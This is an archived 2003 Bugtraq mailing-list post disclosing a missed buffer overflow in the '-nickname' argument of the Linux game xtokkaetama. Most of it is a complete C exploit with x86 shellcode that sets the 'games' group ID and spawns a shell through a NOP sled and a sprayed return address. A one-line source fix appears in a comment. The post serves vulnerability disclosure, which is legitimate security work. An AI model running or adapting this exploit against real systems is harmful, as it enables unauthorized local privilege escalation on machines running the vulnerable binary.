lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 3 Aug 2003 09:52:33 -0000
From: Vade 79 <v9@...ehalo.deadpig.org>
To: bugtraq@...urityfocus.com
Subject: xtokkaetama[v1.0b+]: (missed) buffer overflow exploit.




not a big deal, but after viewing the debian advisory for xtokkaetama; BID 
found at http://www.securityfocus.com/bid/8312.  i took a quick look at 
the source, and noticed an overlooked buffer overflow that occurs later in 
the program.  the overflow is a result of the "-nickname" command line 
argument...quick example exploit follows. (i don't have a debian box here, 
but the exploit should still work ok, tested on redhat7.1)


--------------------------- exploit: xxtama.c ---------------------------

/* (linux/x86)xtokkaetama[v1.0b+]: (games) local buffer overflow exploit.
   by: v9[v9@...ehalo.deadpig.org]. (fakehalo)

   exploits an overflow missed in the patch/upgrade of:
    http://www.securityfocus.com/bid/8312

   fix:
    xtama_score.c:132: +strncpy(name,nickname,sizeof(name)-1);
    xtama_score.c:132: -sscanf( nickname , "%s",name ) ;

   (tested on non-debian, should still work elsewhere)
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <grp.h>
#include <sys/types.h>
#define PATH "/usr/games/xtokkaetama" /* game binary. */
static char exec[]= /* setgid(?)+shell.               */
 "\x31\xdb\x31\xc9\xb3\x00\xb1\x00\x31\xc0\xb0\x47\xcd"
 "\x80\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56"
 "\x07\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34"
 "\x12\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80"
 "\xe8\xd7\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x01";
int main(){
 unsigned int i;
 char *buf;
 struct group *gent;
 printf("(*)xtokkaetama[v1.0b+]: local buffer overflow exploit.\n");
 printf("(*)by: v9@...ehalo.deadpig.org / fakehalo.\n\n");
 if(!(buf=(char *)malloc(16384+1)))exit(1);
 memset(buf,0x90,(16384-strlen(exec)));
 if(!(gent=getgrnam("games")))exec[5]=exec[7]=20;
 else{exec[5]=exec[7]=gent->gr_gid;}
 strcat(buf,exec);
 setenv("EXEC",buf,1);
 memset(buf,0x0,(16384+1));
 for(i=0;i<512;i+=4){*(long *)&buf[i]=0xbfffe001;} 
 printf("[*] in the game, hit: spacebar, \"Q\", spacebar, spacebar.\n");
 sleep(3);
 printf("[*] entering xtokkaetama...\n");
 if(execlp(PATH,PATH,"-nickname",buf,0))
  printf("[!] failed to execute %s.\n",PATH);
 exit(0);
}

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ